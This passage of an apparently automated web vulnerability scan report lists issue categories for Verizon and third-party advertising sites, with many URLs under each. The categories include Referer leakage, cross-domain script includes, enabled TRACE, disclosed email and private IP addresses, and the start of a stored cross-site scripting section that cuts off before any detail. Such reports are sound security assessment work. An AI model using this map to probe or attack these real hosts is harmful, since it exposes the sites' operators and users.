14.48. http://get.adobe.com/flashplayer/

14.49. http://idcs.interclick.com/Segment.aspx

14.50. http://leadback.advertising.com/adcedge/lb

14.51. http://leadback.advertising.com/adcedge/lb

14.52. https://mblogin.verizonwireless.com/amserver/UI/Login

14.53. http://media.verizon.com/media/XmlProxy.ashx

14.54. http://media.verizon.com/media/scripts/widget.ashx

14.55. http://pixel.mathtag.com/event/img

14.56. http://r.turn.com/r/beacon

14.57. http://s.xp1.ru4.com/click

14.58. http://s.xp1.ru4.com/meta

14.59. http://s.xp1.ru4.com/meta

14.60. http://sales.liveperson.net/hc/2329305/

14.61. http://sales.liveperson.net/hc/2329305/cmd/url/

14.62. http://sales.liveperson.net/hc/44153975/

14.63. http://search.verizon.com/favicon.ico

14.64. http://servedby.flashtalking.com/segment/modify/adg

14.65. https://signin.verizon.com/sso/VOLPortalLogin

14.66. http://syndicate.verizon.net/ads/regionlocator.ashx

14.67. http://tags.bluekai.com/site/4357

14.68. http://tap.tapad.com/audience/pxl.png

14.69. http://webmail.verizon.com/signin/

14.70. http://webmail.verizon.net/signin/

14.71. http://webmail.verizon.net/signin/Login.jsp

14.72. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s59195406346116

14.73. http://www.facebook.com/dialog/feed

14.74. http://www.facebook.com/profile.php

14.75. http://www.verizonwireless.com/b2c/index.html

14.76. http://www.verizonwireless.com/b2c/store/controller

14.77. http://www.verizonwireless.com/b2c/vzwfly

14.78. http://www.youtube.com/results

14.79. http://www22.verizon.com/content/commontemplates/validlogin.aspx

14.80. http://www22.verizon.com/content/verizonglobalhome/Intermediate.aspx

14.81. http://www22.verizon.com/content/verizonglobalhome/setValues.aspx

14.82. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js

14.83. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js

14.84. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js

14.85. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js

14.86. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js

14.87. http://www22.verizon.com/onecms/vzcareers/includes/javascript/oo_engine.js

14.88. https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

14.89. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

14.90. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

14.91. https://www22.verizon.com/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx

14.92. https://www22.verizon.com/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx

14.93. https://www22.verizon.com/content/VerizonGlobalHome/validlogin.aspx

14.94. https://www22.verizon.com/includes/cache/15/blank.html

14.95. https://www22.verizon.com/includes/cache/getwb31.asp

14.96. https://www22.verizon.com/includes/javascript/commonjs/

14.97. https://www22.verizon.com/includes/javascript/hbx.js/

14.98. https://www22.verizon.com/includes/javascript/hbx_custom.js/

14.99. https://www22.verizon.com/includes/javascript/sitewise.js/

14.100. https://www22.verizon.com/vztracker/vzTracker.aspx

15. Cross-domain Referer leakage

15.1. http://ad.doubleclick.net/adi/N2870.vznbiz/B3160296

15.2. http://ad.doubleclick.net/adj/syn.verizon/news_read_atf

15.3. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb

15.4. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb

15.5. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog

15.6. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews

15.7. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_quicklinks

15.8. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_supportHelp

15.9. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2

15.10. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10

15.11. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11

15.12. http://cm.g.doubleclick.net/pixel

15.13. http://cm.g.doubleclick.net/pixel

15.14. http://cm.g.doubleclick.net/pixel

15.15. https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do

15.16. http://fls.doubleclick.net/activityi

15.17. http://fls.doubleclick.net/activityi

15.18. http://forums.verizon.com/vrzn/restapi/vc/

15.19. http://media.verizon.com/media/scripts/widget.ashx

15.20. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/homepage/139299456@Top1,x13

15.21. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/news/189057460@Top1,x13

15.22. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1

15.23. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/my.verizon.com/homepage/newuser/150843310@Top1,Bottom,Bottom1,BottomRight

15.24. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/shopvz.net/homepage/109403470@Right,Right1

15.25. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/vznewsroom.net/homepage.html/122796748@Top1,x20,x21,x37,x38,x48,x49,x50,Right1

15.26. http://s7.addthis.com/js/250/addthis_widget.js

15.27. http://search.verizon.com/

15.28. http://search.verizon.com/

15.29. http://search.verizon.com/

15.30. http://smallbusiness.verizon.com/scripts/combined.aspx

15.31. http://webmail.verizon.net/signin/Login.jsp

15.32. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver

15.33. http://www.connecttoverizon.com/loginFailed.html

15.34. http://www.google.com/search

15.35. http://www.google.com/url

15.36. http://www.google.com/url

15.37. http://www.google.com/url

15.38. http://www.google.com/url

15.39. http://www.google.com/url

15.40. http://www.verizonbusiness.com/(en)/topnav.xml

15.41. http://www.verizonbusiness.com/Medium/topnav.xml

15.42. http://www.verizonbusiness.com/topnav.xml

15.43. http://www.verizonwireless.com/b2c/index.html

15.44. http://www.verizonwireless.com/b2c/store/controller

15.45. http://www22.verizon.com/

15.46. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/ak-cached/origin/SupportService.aspx

15.47. http://www22.verizon.com/residential/fiostv

15.48. https://www22.verizon.com/

15.49. https://www22.verizon.com/ForYourHome/VZRepair/vziha/js/jslib.axd

16. Cross-domain script include

16.1. https://b2b.verizonwireless.com/b2b/commerce/privacy.go

16.2. http://b2b.vzw.com/industrysolutions/index.html

16.3. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html

16.4. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571455.html

16.5. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571456.html

16.6. http://d1qpxk1wfeh8v1.cloudfront.net/tags/totaltagdefault.html

16.7. http://fls.doubleclick.net/activityi

16.8. http://fls.doubleclick.net/activityi

16.9. http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248

16.10. http://gigaom.com/cloud/structure-50/

16.11. https://login.verizonwireless.com/amserver/saml2/jsp/idpSSOInit.jsp

16.12. https://mblogin.verizonwireless.com/amserver/UI/Login

16.13. http://newscenter.verizon.com/404.html

16.14. http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html

16.15. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1

16.16. http://phones.verizonwireless.com/htc/thunderbolt/

16.17. http://products.verizonwireless.com/index.aspx

16.18. http://search.verizon.com/

16.19. http://search.vzw.com/

16.20. http://shop.verizonwireless.com/

16.21. http://smallbusiness.verizon.com/

16.22. http://smallbusiness.verizon.com/products/voice/overview.aspx

16.23. http://smallbusiness.verizon.com/products/voice/plans.aspx

16.24. https://survey.qualtrics.com/SE/

16.25. http://www.addthis.com/bookmark.php

16.26. http://www.connecttoverizon.com/

16.27. http://www.connecttoverizon.com/loginFailed.html

16.28. http://www.connecttoverizon.com/order-now.html

16.29. http://www.darkreading.com/security/attacks/showArticle.jhtml

16.30. http://www.facebook.com/connect/prompt_feed.php

16.31. http://www.facebook.com/dialog/feed

16.32. http://www.verizonbusiness.com/Medium/about/promotions/first_6_months/

16.33. http://www.verizonbusiness.com/Medium/about/promotions/premium_data_center/

16.34. http://www.verizonbusiness.com/Medium/about/promotions/smp/

16.35. http://www.verizonbusiness.com/Medium/bundles/vsbb/

16.36. http://www.verizonbusiness.com/Medium/products/conferencing/

16.37. http://www.verizonbusiness.com/Medium/products/internet/ida/

16.38. http://www.verizonbusiness.com/Medium/products/managed/managed_mobility/

16.39. http://www.verizonbusiness.com/Medium/resources/vertical.xml

16.40. http://www.verizonbusiness.com/Medium/sign-in/vec/

16.41. http://www.verizonbusiness.com/Medium/sign-in/vec/basic.xml

16.42. http://www.verizonbusiness.com/Medium/sign-in/vec/essentials.xml

16.43. http://www.verizonbusiness.com/Medium/sign-in/vec/igus.xml

16.44. http://www.verizonbusiness.com/Medium/sign-in/vec/looking.xml

16.45. http://www.verizonbusiness.com/Medium/sign-in/vec/network.xml

16.46. http://www.verizonbusiness.com/Medium/sign-in/vec/voip.xml

16.47. http://www.verizonbusiness.com/Medium/sign-in/vec/wan.xml

16.48. http://www.verizonbusiness.com/about/ipinnovation/

16.49. http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml

16.50. http://www.verizonbusiness.com/us/Products/networking/internet/ipv6/

16.51. http://www.verizonwireless.com/b2c/&hec=1&lid=//hp//p//100+Trade+In//Imp&hid=0.07034434005618095

16.52. http://www.verizonwireless.com/b2c/&hec=10&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.7112846237141639

16.53. http://www.verizonwireless.com/b2c/&hec=11&lid=//hp//p//100+Trade+In//Imp&hid=0.3314754036255181

16.54. http://www.verizonwireless.com/b2c/&hec=2&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.8891192970331758

16.55. http://www.verizonwireless.com/b2c/&hec=3&lid=//hp//p//Deals+Central//Imp&hid=0.5899386655073613

16.56. http://www.verizonwireless.com/b2c/&hec=4&lid=//hp//p//Back+To+School//Imp&hid=0.734757476951927

16.57. http://www.verizonwireless.com/b2c/&hec=5&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.5447121190372854

16.58. http://www.verizonwireless.com/b2c/&hec=6&lid=//hp//p//100+Trade+In//Imp&hid=0.9608070966787636

16.59. http://www.verizonwireless.com/b2c/&hec=7&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.20118952100165188

16.60. http://www.verizonwireless.com/b2c/&hec=8&lid=//hp//p//Deals+Central//Imp&hid=0.22915508295409381

16.61. http://www.verizonwireless.com/b2c/&hec=9&lid=//hp//p//Back+To+School//Imp&hid=0.48359646485187113

16.62. http://www.verizonwireless.com/b2c/CoverageLocatorController

16.63. http://www.verizonwireless.com/b2c/aboutUs/affiliate/index.jsp

16.64. http://www.verizonwireless.com/b2c/deviceFinder/index.jsp

16.65. http://www.verizonwireless.com/b2c/employee/emaildomainauthentication.jsp

16.66. http://www.verizonwireless.com/b2c/explore/

16.67. http://www.verizonwireless.com/b2c/index.html

16.68. http://www.verizonwireless.com/b2c/index.html

16.69. http://www.verizonwireless.com/b2c/promo/splash/ewp

16.70. http://www.verizonwireless.com/b2c/promotion/specialoffers.jsp

16.71. http://www.verizonwireless.com/b2c/store/&hec=1&cv.c13=session+timeout+alert&hid=0.12213333742693067

16.72. http://www.verizonwireless.com/b2c/store/&hec=2&cv.c13=session+alert+active&hid=0.4740242080297321

16.73. http://www.verizonwireless.com/b2c/store/accessory

16.74. http://www.verizonwireless.com/b2c/store/controller

16.75. http://www.verizonwireless.com/b2c/vzwfly

16.76. https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login

16.77. https://www.whitefence.com/WebObjects/WhiteFenceService.woa/wa/forgotPassword

16.78. http://www.youtube.com/results

16.79. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm

16.80. http://www22.verizon.com/jobs/

16.81. http://www22.verizon.com/jobs/search-jobs

16.82. http://www22.verizon.com/jobs/verizon-wireless/search-jobs

16.83. http://www22.verizon.com/residential/fiostv

16.84. https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

16.85. https://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm

17. File upload functionality

18. TRACE method is enabled

18.1. http://s.xp1.ru4.com/

18.2. http://www.verizonwireless.com/

19. Email addresses disclosed

19.1. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/css/generalWH.css

19.2. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/css/print.css

19.3. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/css/theme-vzw-RW.css

19.4. http://headlines.verizon.com/headlines/resources/js/tabber_ajax.js

19.5. http://newscenter.verizon.com/components/print/printer-friendly.js

19.6. http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html

19.7. http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx

19.8. http://webmail.verizon.com/signin/

19.9. http://webmail.verizon.net/signin/

19.10. http://webmail.verizon.net/signin/Login.jsp

19.11. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver

19.12. https://www.bbb.org/online/consumer/cks.aspx

19.13. http://www.darkreading.com/security/attacks/showArticle.jhtml

19.14. https://www.google.com/accounts/ServiceLogin

19.15. http://www.verizonbusiness.com/Medium/sign-in/vec/

19.16. http://www.verizonbusiness.com/Medium/sign-in/vec/basic.xml

19.17. http://www.verizonbusiness.com/Medium/sign-in/vec/essentials.xml

19.18. http://www.verizonbusiness.com/Medium/sign-in/vec/igus.xml

19.19. http://www.verizonbusiness.com/Medium/sign-in/vec/looking.xml

19.20. http://www.verizonbusiness.com/Medium/sign-in/vec/network.xml

19.21. http://www.verizonbusiness.com/Medium/sign-in/vec/voip.xml

19.22. http://www.verizonbusiness.com/Medium/sign-in/vec/wan.xml

19.23. http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml

19.24. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/Includes/Javascript/FuncInc.js

19.25. http://www22.verizon.com/content/commontemplates/includes/Javascript/ddpng.js

19.26. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js

19.27. https://www22.verizon.com/ForYourHome/VZRepair/vziha/js/jslib.axd

20. Private IP addresses disclosed

20.1. https://b2b.verizonwireless.com/b2b/commerce/privacy.go

20.2. http://content.atomz.com/autocomplete/sp10/04/3b/7b/

20.3. http://newscenter.verizon.com/404.html

20.4. http://newscenter.verizon.com/404.html

20.5. http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html

20.6. http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html

20.7. https://survey.qualtrics.com/SE/

20.8. http://www.facebook.com/connect/prompt_feed.php

20.9. http://www.facebook.com/dialog/feed

20.10. http://www.facebook.com/plugins/like.php

20.11. http://www.facebook.com/plugins/like.php

20.12. http://www.facebook.com/profile.php

20.13. http://www.facebook.com/sharer.php

20.14. http://www.google.com/sdch/StnTz5pY.dct

20.15. http://www.whitefence.com/static/Seymour.js

21. Credit card numbers disclosed

22. Robots.txt file

22.1. http://ad.yieldmanager.com/pixel

22.2. http://cache.vzw.com/stylesheets/fonts.css

22.3. http://ehg-verizon.hitbox.com/HG

22.4. http://g-pixel.invitemedia.com/gmatcher

22.5. http://pixel.mathtag.com/event/img

22.6. http://pixel.quantserve.com/pixel

22.7. http://r.turn.com/server/beacon_call.js

22.8. http://s.xp1.ru4.com/meta

22.9. http://segment-pixel.invitemedia.com/pixel

22.10. http://verizon.com/

22.11. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

22.12. http://www.googleadservices.com/pagead/conversion/1032222048/

22.13. http://www.verizonwireless.com/b2c/index.html

22.14. http://www22.verizon.com/

23. Cacheable HTTPS response

23.1. https://12.xg4ken.com/media/redir.php

23.2. https://collaborateext.verizon.com/aims/encore/VZCTC.serv

23.3. https://collaborateext.verizon.com/aims/encore/VzVAgent.jsp

23.4. https://collaborateext.verizon.com/aims/encore/VzVirtualAgent.jsp

23.5. https://collaborateext.verizon.com/aims/html/blank.html

23.6. https://dashboard.opinionlab.com/pv_controlboard.html

23.7. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf

23.8. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf

23.9. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf

23.10. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf

23.11. https://enterprisecenter.verizon.com/enterprisesolutions/Includes/Shared/struts/TealeafTarget.jsp

23.12. https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/submitEnrollmentProfileInfo.do

23.13. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/s.gif

23.14. https://enterprisecenter.verizon.com/future/vzw/css_reference_PatLib/includes/css/print.css

23.15. https://enterpriseportalcontent.mci.com/CC/public/Login/en-US/Enroll.htm

23.16. https://seal.verisign.com/getseal

23.17. https://secure.opinionlab.com/ccc01/comment_card.asp

23.18. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

23.19. https://secure.opinionlab.com/rate36_json.asp

23.20. https://secure.opinionlab.com/rate36s.asp

23.21. https://signin.verizon.com/sso/ForgotPassword

23.22. https://signin.verizon.com/sso/ForgotUserIdAndPwd

23.23. https://signin.verizon.com/sso/ResetAccount

23.24. https://signin.verizon.com/sso/RetrieveUserID

23.25. https://signin.verizon.com/sso/forgotFlows/locateBAN.jsp

23.26. https://www.bbb.org/online/consumer/cks.aspx

23.27. https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login

23.28. https://www.whitefence.com/WebObjects/WhiteFenceService.woa/wa/forgotPassword

23.29. https://www22.verizon.com/

23.30. https://www22.verizon.com/ForYourHome/VzRepair/VzIHA/TealeafTarget.aspx

23.31. https://www22.verizon.com/content/verizonglobalhome/res_signin.aspx

23.32. https://www22.verizon.com/includes/cache/15/blank.html

23.33. https://www22.verizon.com/includes/cache/getwb31.asp

23.34. https://www22.verizon.com/includes/javascript/commonjs/

23.35. https://www22.verizon.com/includes/javascript/oo_engine_c.js

23.36. https://www22.verizon.com/myverizon/

24. HTML does not specify charset

24.1. http://ad.doubleclick.net/adi/N2870.vznbiz/B3160296

24.2. http://cache.vzw.com/scripts/globalnav/blank.html

24.3. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html

24.4. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571455.html

24.5. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571456.html

24.6. http://d1qpxk1wfeh8v1.cloudfront.net/tags/totaltagdefault.html

24.7. http://dcshm.verizon.net/dcsjcxdpzghjg5e6ym5wj21gv_1r5z/wtid.js

24.8. http://dcshm.verizon.net/dcso2yy35hhjg5e6ym5wj21gv_6r3b/wtid.js

24.9. http://ehg-verizon.hitbox.com/HG

24.10. http://ehg-verizon.hitbox.com/HGct

24.11. https://enterprisecenter.verizon.com/

24.12. http://fls.doubleclick.net/activityi

24.13. http://headlines.verizon.com/

24.14. http://headlines.verizon.com/headlines/resources/images/featuredArticle.png

24.15. http://headlines.verizon.com/headlines/resources/images/followUsOnTwitter.png

24.16. http://headlines.verizon.com/headlines/resources/images/navOff_02.png

24.17. http://headlines.verizon.com/headlines/resources/images/navOff_03.png

24.18. http://headlines.verizon.com/headlines/resources/images/navOff_04.png

24.19. http://headlines.verizon.com/headlines/resources/images/navOff_05.png

24.20. http://headlines.verizon.com/headlines/resources/images/navOff_06.png

24.21. http://headlines.verizon.com/headlines/resources/images/navOff_07.png

24.22. http://headlines.verizon.com/headlines/resources/images/navOff_08.png

24.23. http://headlines.verizon.com/headlines/resources/images/navOn_01.png

24.24. http://headlines.verizon.com/headlines/resources/images/pageTitleHeadlines.png

24.25. http://headlines.verizon.com/headlines/resources/images/primaryNavPipe.png

24.26. http://headlines.verizon.com/headlines/resources/images/twit_pipe.png

24.27. http://headlines.verizon.com/headlines/resources/images/verizonEmail.png

24.28. http://phones.verizonwireless.com/htc/thunderbolt/

24.29. http://promo.verizon.com/omk/online.shtml

24.30. http://s.xp1.ru4.com/meta

24.31. http://sales.liveperson.net/visitor/addons/deploy.asp

24.32. http://search.verizon.com/

24.33. https://secure.opinionlab.com/rate36_json.asp

24.34. https://secure.opinionlab.com/rate36s.asp

24.35. http://tags.bluekai.com/site/4335

24.36. http://tags.bluekai.com/site/4357

24.37. http://verizon.com/

24.38. http://verizonconnections.vzcomportal.com/

24.39. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

24.40. http://webmail.verizonemail.net/

24.41. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver

24.42. http://www.connecttoverizon.com/

24.43. http://www.connecttoverizon.com/loginFailed.html

24.44. http://www.connecttoverizon.com/order-now.html

24.45. http://www.verizon.com/fiostv

24.46. http://www.verizonbusiness.com/Medium/about/promotions/ida_t1/%20

24.47. http://www22.verizon.com/copyright

24.48. http://www22.verizon.com/wholesale/solutions/solution/physical%2bcollo.html

24.49. https://www22.verizon.com/foryourhome/registration/forgotuid/javascript:void(0)

24.50. https://www22.verizon.com/includes/javascript/commonjs/

24.51. https://www22.verizon.com/includes/javascript/oo_engine_c.js

24.52. https://www22.verizon.com/myverizon/

24.53. https://www22.verizon.com/vzTracker/vzTracker.aspx

25. HTML uses unrecognised charset

25.1. http://search.vzw.com/

25.2. https://secure.opinionlab.com/ccc01/comment_card.asp

25.3. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

25.4. http://www22.verizon.com/ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm

25.5. http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm

25.6. http://www22.verizon.com/content/ContactUs/

25.7. http://www22.verizon.com/residentialhelp/fiostv

25.8. http://www22.verizon.com/residentialhelp/inhomeagent

25.9. http://www22.verizon.com/residentialhelp/inhomeagent/

25.10. http://www22.verizon.com/residentialhelp/phone

26. Content type incorrectly stated

26.1. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb

26.2. http://cache.vzw.com/fonts/verizonApex-book-ex.woff

26.3. http://cache.vzw.com/globalnav/globalnavmenu.txt

26.4. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/fonts/apex.swf

26.5. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/fonts/superscript.swf

26.6. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf

26.7. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf

26.8. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf

26.9. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf

26.10. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf

26.11. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf

26.12. http://cache.vzw.com/images_b2c/homepage/biz_marquee_verticals.swf

26.13. http://cache.vzw.com/testNtarget/thin_omninav2.0.4.js

26.14. http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_FIOSTVFeaturesPage.js

26.15. http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_VerizoncomHomepage.js

26.16. https://collaborateext.verizon.com/aims/encore/VZCTC.serv

26.17. https://collaborateext.verizon.com/pre/pre/pre.serv

26.18. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf

26.19. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf

26.20. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf

26.21. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf

26.22. http://get.adobe.com/cfusion/search/buddy/searchbuddy.cfm

26.23. http://get.adobe.com/cfusion/search/index.cfm

26.24. http://headlines.verizon.com/headlines/GetPoll

26.25. http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/Core.jsp

26.26. http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp

26.27. http://headlines.verizon.com/headlines/resources/images/featuredArticle.png

26.28. http://headlines.verizon.com/headlines/resources/images/followUsOnTwitter.png

26.29. http://headlines.verizon.com/headlines/resources/images/navOff_02.png

26.30. http://headlines.verizon.com/headlines/resources/images/navOff_03.png

26.31. http://headlines.verizon.com/headlines/resources/images/navOff_04.png

26.32. http://headlines.verizon.com/headlines/resources/images/navOff_05.png

26.33. http://headlines.verizon.com/headlines/resources/images/navOff_06.png

26.34. http://headlines.verizon.com/headlines/resources/images/navOff_07.png

26.35. http://headlines.verizon.com/headlines/resources/images/navOff_08.png

26.36. http://headlines.verizon.com/headlines/resources/images/navOn_01.png

26.37. http://headlines.verizon.com/headlines/resources/images/pageTitleHeadlines.png

26.38. http://headlines.verizon.com/headlines/resources/images/primaryNavPipe.png

26.39. http://headlines.verizon.com/headlines/resources/images/tstories/tStoriesControl_pause.gif

26.40. http://headlines.verizon.com/headlines/resources/images/tstories/tStoriesControl_right.gif

26.41. http://headlines.verizon.com/headlines/resources/images/tstories/tStoriesControl_rightOn.gif

26.42. http://headlines.verizon.com/headlines/resources/images/twit_pipe.png

26.43. http://headlines.verizon.com/headlines/resources/images/verizonEmail.png

26.44. http://maps.google.com/maps/api/js

26.45. http://s.xp1.ru4.com/meta

26.46. http://sales.liveperson.net/hcp/html/mTag.js

26.47. http://sales.liveperson.net/visitor/addons/deploy.asp

26.48. https://seal.verisign.com/getseal

26.49. https://secure.opinionlab.com/rate36_json.asp

26.50. https://secure.opinionlab.com/rate36s.asp

26.51. http://sr2.liveperson.net/hcp/html/mTag.js

26.52. http://syndicate.verizon.com/ads/js.ashx

26.53. http://syndicate.verizon.net/ads/js.ashx

26.54. http://syndicate.verizon.net/ads/scripthandler.ashx

26.55. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

26.56. http://www.connecttoverizon.com/favicon.ico

26.57. http://www.google.com/search

26.58. http://www.verizonbusiness.com/crossdomain.xml

26.59. http://www.verizonbusiness.com/sitemap/tips.xml

26.60. http://www.verizonbusiness.com/templates/vzbar/bertprefs.json

26.61. http://www22.verizon.com/content/verizonglobalhome/gPromo.aspx

26.62. http://www22.verizon.com/content/verizonglobalhome/setValues.aspx

26.63. http://www22.verizon.com/foryourhome/MyAccount/Unprotected/common/dock_new.aspx

26.64. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/Images/truste_logo2.gif

26.65. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_continueS.gif

26.66. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_ok.gif

26.67. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/headers/bk.gif

26.68. https://www22.verizon.com/ForYourSmallBiz/GoFlow/Common/Images/OrderNew/buttons/gray.gif

26.69. https://www22.verizon.com/content/verizonglobalhome/gPromo.aspx

26.70. https://www22.verizon.com/foryoursmallbiz/goflow/common/images/OrderNew/form/checkbox.gif

26.71. https://www22.verizon.com/includes/cache/getwb31.asp

26.72. https://www22.verizon.com/includes/javascript/commonjs/

26.73. https://www22.verizon.com/includes/javascript/oo_engine_c.js

27. Content type is not specified

27.1. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/config.xml

27.2. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/content/data_feed_en.xml

27.3. http://newscenter.verizon.com/assets/igallery/ESPN3.JPG

27.4. http://webmail.verizon.com/favicon.ico

27.5. http://webmail.verizon.net/favicon.ico

27.6. http://www22.verizon.com/includes/javascript/pagetracker.js

27.7. https://www22.verizon.com/includes/javascript/hbx.js/

27.8. https://www22.verizon.com/includes/javascript/hbx_custom.js/

27.9. https://www22.verizon.com/includes/javascript/hbx_dupreq.js

27.10. https://www22.verizon.com/includes/javascript/pagetracker.js

27.11. https://www22.verizon.com/includes/javascript/scb.js

27.12. https://www22.verizon.com/includes/javascript/scb31.js

27.13. https://www22.verizon.com/includes/javascript/scb31menu.js

27.14. https://www22.verizon.com/includes/javascript/scbsearch.js

27.15. https://www22.verizon.com/includes/javascript/sitewise.js/



1. Cross-site scripting (stored)
There are 3 instances of this issue:

Issue background

